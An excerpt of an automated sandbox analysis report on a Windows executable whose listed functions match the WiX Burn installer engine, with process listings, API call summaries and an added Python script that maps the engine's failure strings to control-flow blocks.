MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:17:04:58
Start date:06/01/2025
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:3
Imagebase:0x7ff67dcd0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:18
Start time:17:05:01
Start date:06/01/2025
Path:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Wow64 process (32bit):false
Commandline:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Imagebase:0x140000000
File size:2'364'728 bytes
MD5 hash:967F4470627F823F4D7981E511C9824F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:17:05:01
Start date:06/01/2025
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6512 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8
Imagebase:0x7ff67dcd0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:17:05:01
Start date:06/01/2025
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6748 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8
Imagebase:0x7ff67dcd0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:17:05:03
Start date:06/01/2025
Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7392 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8
Imagebase:0x7ff655090000
File size:1'255'976 bytes
MD5 hash:76C58E5BABFE4ACF0308AA646FC0F416
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:17:05:03
Start date:06/01/2025
Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7392 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8
                                                                                                                                                            Imagebase:0x7ff655090000
                                                                                                                                                            File size:1'255'976 bytes
                                                                                                                                                            MD5 hash:76C58E5BABFE4ACF0308AA646FC0F416
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:26
                                                                                                                                                            Start time:17:05:14
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                                                                                                                                                            Imagebase:0x7ff67dcd0000
                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:27
                                                                                                                                                            Start time:17:05:14
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1992,i,12794935825972523689,1062421692314691261,262144 /prefetch:3
                                                                                                                                                            Imagebase:0x7ff67dcd0000
                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:29
                                                                                                                                                            Start time:17:05:22
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                                                                                                                                                            Imagebase:0x7ff67dcd0000
                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:30
                                                                                                                                                            Start time:17:05:23
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1984,i,5351310162108678119,10159255576747894809,262144 /prefetch:3
                                                                                                                                                            Imagebase:0x7ff67dcd0000
                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:31
                                                                                                                                                            Start time:17:05:58
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6644 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8
                                                                                                                                                            Imagebase:0x7ff67dcd0000
                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:false


                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 007C3D40
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C3D53
                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000001,00000000,?), ref: 007C3D9E
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C3DA8
                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?,?,?,?,00000001,00000000,?), ref: 007C3DF6
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C3E00
                                                                                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,*.*,?,?,?,?,00000001,00000000,?), ref: 007C3E53
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C3E64
                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00000001,00000000,?), ref: 007C3F3E
                                                                                                                                                              • DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,00000001,00000000,?), ref: 007C3F52
                                                                                                                                                              • GetTempFileNameW.KERNEL32(?,DEL,00000000,?,?,?,?,00000001,00000000,?), ref: 007C3F79
                                                                                                                                                              • MoveFileExW.KERNEL32(?,?,00000001,?,?,?,00000001,00000000,?), ref: 007C3F9C
                                                                                                                                                              • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 007C3FB5
                                                                                                                                                              • FindNextFileW.KERNELBASE(000000FF,?,?,?,?,?,?,?,00000001,00000000,?), ref: 007C3FC5
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C3FDA
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C4009
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C402B
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C404D
                                                                                                                                                              • RemoveDirectoryW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 007C4064
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C406E
                                                                                                                                                              • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 007C4095
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C40B0
                                                                                                                                                              • FindClose.KERNEL32(000000FF,?,?,?,00000001,00000000,?), ref: 007C40E6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLast$AttributesFindMove$Temp$CloseDeleteDirectoryFirstNameNextPathRemove
                                                                                                                                                              • String ID: *.*$DEL$dirutil.cpp
                                                                                                                                                              • API String ID: 1544372074-1252831301
                                                                                                                                                              • Opcode ID: 2dd18edb1db330b07bbeeb9665ea7bd8b6f93dd4fda0d4ef3972ba33e1b36e57
                                                                                                                                                              • Instruction ID: e4dd1c109893cf5829074ec2260df6a56d1b652d13cc22d82406d87c78f4b9de
                                                                                                                                                              • Opcode Fuzzy Hash: 2dd18edb1db330b07bbeeb9665ea7bd8b6f93dd4fda0d4ef3972ba33e1b36e57
                                                                                                                                                              • Instruction Fuzzy Hash: 87B1C673D412399BDB315A648C05F9AB775AF40760F0142EDEE09BB190D77A9E90CBE0

                                                                                                                                                              Control-flow Graph

APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 007C5217
  • Part of subcall function 008004F8: InitializeCriticalSection.KERNEL32(0082B5FC,?,007C5223,00000000,?,?,?,?,?,?), ref: 0080050F
  • Part of subcall function 007C120A: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,007C523F,00000000,?), ref: 007C1248
  • Part of subcall function 007C120A: GetLastError.KERNEL32(?,?,?,007C523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 007C1252
• CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 007C5285
  • Part of subcall function 00800E07: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00800E28
• GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 007C5317
• GetLastError.KERNEL32(?,?,?,?,?,?), ref: 007C5321
• CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 007C558E
Strings
• Failed to initialize Regutil., xrefs: 007C52C9
• Failed to initialize Wiutil., xrefs: 007C52E1
• Failed to initialize XML util., xrefs: 007C52F9
• 3.11.1.2318, xrefs: 007C5384
• Failed to initialize Cryputil., xrefs: 007C52A6
• Failed to initialize COM., xrefs: 007C5291
• Failed to initialize core., xrefs: 007C53C3
• Failed to get OS info., xrefs: 007C534F
• Invalid run mode., xrefs: 007C53F9
• Failed to run RunOnce mode., xrefs: 007C541C
• Failed to initialize engine state., xrefs: 007C526C
• Failed to run per-user mode., xrefs: 007C5494
• Failed to run embedded mode., xrefs: 007C5444
• engine.cpp, xrefs: 007C5345
• Failed to run untrusted mode., xrefs: 007C54B6
• Failed to parse command line., xrefs: 007C5245
• Failed to run per-machine mode., xrefs: 007C546C
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
• String ID: 3.11.1.2318$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$engine.cpp
• API String ID: 3262001429-510904028
• Opcode ID: d0d04abf044953af5cf59e1c14e910eca43004d42c9a05711104ddd77108e2df
• Instruction ID: e5eb586815356ffa6ab04ee19ae78466694d0789943a20b5842a15bf7277d862
• Opcode Fuzzy Hash: d0d04abf044953af5cf59e1c14e910eca43004d42c9a05711104ddd77108e2df
• Instruction Fuzzy Hash: 3FB1A272D41A699BDB31AA64CC46FED77B5BF44310F00019DE908B6281DB7AAED0CF91
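The function above is easier to read once the flattened control_flow_graph line is turned back into blocks and edges and each "Failed to ..." xref is tied to the basic block that logs it. The message set (engine.cpp, the Cryputil/Regutil/Wiutil/XML util initialisers, the per-user, per-machine, embedded, untrusted and RunOnce run modes, and the version string 3.11.1.2318) is that of the WiX Toolset's Burn bootstrapper engine, so this entry function is Burn's engine start-up and the signatures listed at the top of the report most likely come from what the bundle carries rather than from this code. The script below is an added example written for this page; it is not Joe Sandbox, IDA or WiX code. Its input is an excerpt of the control_flow_graph line printed above (the initialisation chain only) plus the Strings table of this function, both embedded as constructed data; it assumes a block range "lo-hi" spans from the start of its first instruction to the start of its last one.

```python
"""Parse the flattened control_flow_graph line of a Joe Sandbox function listing
and tie each failure string to the call it guards.  Added example, not Joe
Sandbox, IDA or WiX code."""
import re
from collections import defaultdict

# Constructed input: excerpt of the control_flow_graph line for the function at
# 7c5195 as printed on this page (init chain only; the run-mode part is cut).
CFG_EXCERPT = (
    "control_flow_graph 921 7c5195-7c5243 call 7ef8e0 * 2 GetModuleHandleW call 8004f8 "
    "call 8006ae call 7c120a 932 7c5259-7c526a call 7c42d7 921->932 933 7c5245 921->933 "
    "939 7c526c-7c5271 932->939 940 7c5273-7c528f call 7c5618 CoInitializeEx 932->940 "
    "934 7c524a-7c5254 call 800237 933->934 941 7c54d4-7c54db 934->941 939->934 "
    "949 7c5298-7c52a4 call 7ffcae 940->949 950 7c5291-7c5296 940->950 "
    "958 7c52b8-7c52c7 call 800e07 949->958 959 7c52a6 949->959 950->934 "
    "968 7c52c9-7c52ce 958->968 969 7c52d0-7c52df call 802af7 958->969 "
    "961 7c52ab-7c52b3 call 800237 959->961 961->941 968->961 "
    "977 7c52e8-7c52f7 call 803565 969->977 978 7c52e1-7c52e6 969->978 "
    "993 7c52f9-7c52fe 977->993 994 7c5300-7c531f GetVersionExW 977->994 978->961 993->961 "
    "996 7c5321-7c532b GetLastError 994->996 1001 7c532d-7c5336 996->1001 1002 7c5338 "
    "996->1002 1001->1002 1007 7c533f-7c5354 call 7c3821 1002->1007 1008 7c533a "
    "1002->1008 1007->961 1008->1007"
)

# Strings section of the same function: message -> xref address.
STRING_XREFS = {
    "Failed to parse command line.": 0x7C5245,
    "Failed to initialize engine state.": 0x7C526C,
    "Failed to initialize COM.": 0x7C5291,
    "Failed to initialize Cryputil.": 0x7C52A6,
    "Failed to initialize Regutil.": 0x7C52C9,
    "Failed to initialize Wiutil.": 0x7C52E1,
    "Failed to initialize XML util.": 0x7C52F9,
    "Failed to get OS info.": 0x7C534F,
}

# One alternative per token class: edge, block header, local call, API name.
TOKEN_RE = re.compile(
    r"(\d+)->(\d+)"                                # edge src->dst
    r"|(\d+) ([0-9a-f]{4,8}(?:-[0-9a-f]{4,8})?)"   # block id + address range
    r"|call ([0-9a-f]+)(?: \* (\d+))?"             # call <addr> [* N]
    r"|(\w+)"                                      # imported API name
)


def parse_cfg(line):
    """Return (blocks, preds, succs); blocks: id -> {"range", "notes"}, where
    notes are IDA's annotations (local calls and imported APIs) on the block."""
    blocks, preds, succs = {}, defaultdict(set), defaultdict(set)
    cur = None
    for m in TOKEN_RE.finditer(line):
        src, dst, bid, rng, callee, times, api = m.groups()
        if src:
            succs[int(src)].add(int(dst))
            preds[int(dst)].add(int(src))
        elif bid:
            cur = int(bid)
            blocks[cur] = {"range": rng, "notes": []}
        elif callee:
            blocks[cur]["notes"].append(f"call {callee}" + (f" x{times}" if times else ""))
        elif api != "control_flow_graph":          # leading keyword of the line
            blocks[cur]["notes"].append(api)
    return blocks, preds, succs


def block_of(blocks, addr):
    """Id of the block whose range contains addr (hi = start of last insn)."""
    for bid, b in blocks.items():
        lo, _, hi = b["range"].partition("-")
        if int(lo, 16) <= addr <= int(hi or lo, 16):
            return bid
    raise KeyError(hex(addr))


def guarded_calls(blocks, preds, bid, limit=2):
    """Walk predecessors breadth-first; return up to `limit` annotated blocks,
    nearest first, as (range, notes).  For an error handler that is the API or
    local call whose failure the logged message reports."""
    seen, frontier, found = {bid}, [bid], []
    while frontier and len(found) < limit:
        nxt = []
        for b in frontier:
            for p in sorted(preds[b] - seen):
                seen.add(p)
                nxt.append(p)
                if blocks[p]["notes"] and len(found) < limit:
                    found.append((blocks[p]["range"], blocks[p]["notes"]))
        frontier = nxt
    return found


def failure_sink(blocks, succs, bid):
    """Notes of the single block an error handler falls through to."""
    (nxt,) = succs[bid]
    return blocks[nxt]["notes"]


def explain(msg, limit=2):
    """(handler block range, guarded calls, sink notes) for one failure string."""
    blocks, preds, succs = parse_cfg(CFG_EXCERPT)
    bid = block_of(blocks, STRING_XREFS[msg])
    return (blocks[bid]["range"], guarded_calls(blocks, preds, bid, limit),
            failure_sink(blocks, succs, bid))


if __name__ == "__main__":
    for msg in STRING_XREFS:
        rng, guards, sink = explain(msg)
        print(f"{msg:36} @{rng:14} guards {guards[0][1]} -> {sink}")
```

Run stand-alone it prints one line per message, for instance that "Failed to initialize COM." lives in 7c5291-7c5296, is reached only from the block that calls CoInitializeEx, and falls into 7c524a-7c5254, which calls 800237. Every handler in the excerpt ends in a block whose only annotation is "call 800237", so that routine is the shared log-and-exit path; the two-step ancestor walk also shows the "Failed to get OS info." handler sitting behind GetLastError and, one block earlier, GetVersionExW.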
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00803609,00000000,?,00000000), ref: 00803069
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,007EC025,?,007C5405,?,00000000,?), ref: 00803075
• GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 008030B5
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008030C1
• GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 008030CC
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008030D6
• CoCreateInstance.OLE32(0082B6B8,00000000,00000001,0080B818,?,?,?,?,?,?,?,?,?,?,?,007EC025), ref: 00803111
• ExitProcess.KERNEL32 ref: 008031C0
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
• String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
• API String ID: 2124981135-499589564
• Opcode ID: 22143a4ce1d276a4aebed940009751f91706c94b652a02d5e398f8c5b2914b23
• Instruction ID: e6e0bdf9aa8dcf2b5965fd7befc771ef80271af7d614d52585144cf8e716c910
• Opcode Fuzzy Hash: 22143a4ce1d276a4aebed940009751f91706c94b652a02d5e398f8c5b2914b23
• Instruction Fuzzy Hash: D041AD31A02625AFDB649BA8CC55BAEB7ACFF48710F114169F901EB390DB71DE408B90
APIs
  • Part of subcall function 007C33C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,007C10DD,?,00000000), ref: 007C33E8
• CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 007C10F6
  • Part of subcall function 007C1175: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,007C111A,cabinet.dll,00000009,?,?,00000000), ref: 007C1186
  • Part of subcall function 007C1175: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,007C111A,cabinet.dll,00000009,?,?,00000000), ref: 007C1191
  • Part of subcall function 007C1175: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 007C119F
  • Part of subcall function 007C1175: GetLastError.KERNEL32(?,?,?,?,?,007C111A,cabinet.dll,00000009,?,?,00000000), ref: 007C11BA
  • Part of subcall function 007C1175: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 007C11C2
  • Part of subcall function 007C1175: GetLastError.KERNEL32(?,?,?,?,?,007C111A,cabinet.dll,00000009,?,?,00000000), ref: 007C11D7
• CloseHandle.KERNELBASE(?,?,?,?,0080B4D0,?,cabinet.dll,00000009,?,?,00000000), ref: 007C1131
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
• String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
• API String ID: 3687706282-3151496603
• Opcode ID: 3f22433d6f079d798591120f9cf4dc85fb98cd784df41215411f6658f19739b9
• Instruction ID: 171b361592548955f0a7e9b839bcffd519c4097e5a0012b0f25ce8ce0e175497
• Opcode Fuzzy Hash: 3f22433d6f079d798591120f9cf4dc85fb98cd784df41215411f6658f19739b9
• Instruction Fuzzy Hash: A0215E7190061CABDB509FA4DC49FDEBBB8FF0A710F54412DEA10B7282D77899088BA4
Strings
• Failed create working folder., xrefs: 007DA0EE
• Failed to copy working folder., xrefs: 007DA116
• Failed to calculate working folder to ensure it exists., xrefs: 007DA0D8
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CurrentDirectoryErrorLastProcessWindows
• String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
• API String ID: 3841436932-2072961686
• Opcode ID: d9d3003e740463102d9e08a891ec54ae69dd47c1c00b128628dd542d4951f891
• Instruction ID: 40bf1642418a047810f84426ed42863f4661b437b4eb4bf3464e2c4f3ff7e5b6
• Opcode Fuzzy Hash: d9d3003e740463102d9e08a891ec54ae69dd47c1c00b128628dd542d4951f891
• Instruction Fuzzy Hash: 1001843290552CFB8B225A55DC07C9EBB79FF54B20B104256F800BA311EB3E9E50E692
APIs
• GetCurrentProcess.KERNEL32(00000000,?,007F48AE,00000000,00827F08,0000000C,007F4A05,00000000,00000002,00000000), ref: 007F48F9
• TerminateProcess.KERNEL32(00000000,?,007F48AE,00000000,00827F08,0000000C,007F4A05,00000000,00000002,00000000), ref: 007F4900
• ExitProcess.KERNEL32 ref: 007F4912
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 5c0032e45dd9c97023a91d7f86e4dc67da81cdcd06ddb3d3865ca21c120caaec
• Instruction ID: 70ce92c7e7179b809b89a3b0f4f5b43231084f435743310dd1b7a15c4d559672
• Opcode Fuzzy Hash: 5c0032e45dd9c97023a91d7f86e4dc67da81cdcd06ddb3d3865ca21c120caaec
• Instruction Fuzzy Hash: 2BE0B63150024CABCF51AFA4DD0DA6A3B69FF45781B104014FA298A322CB79ED52CA90
                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
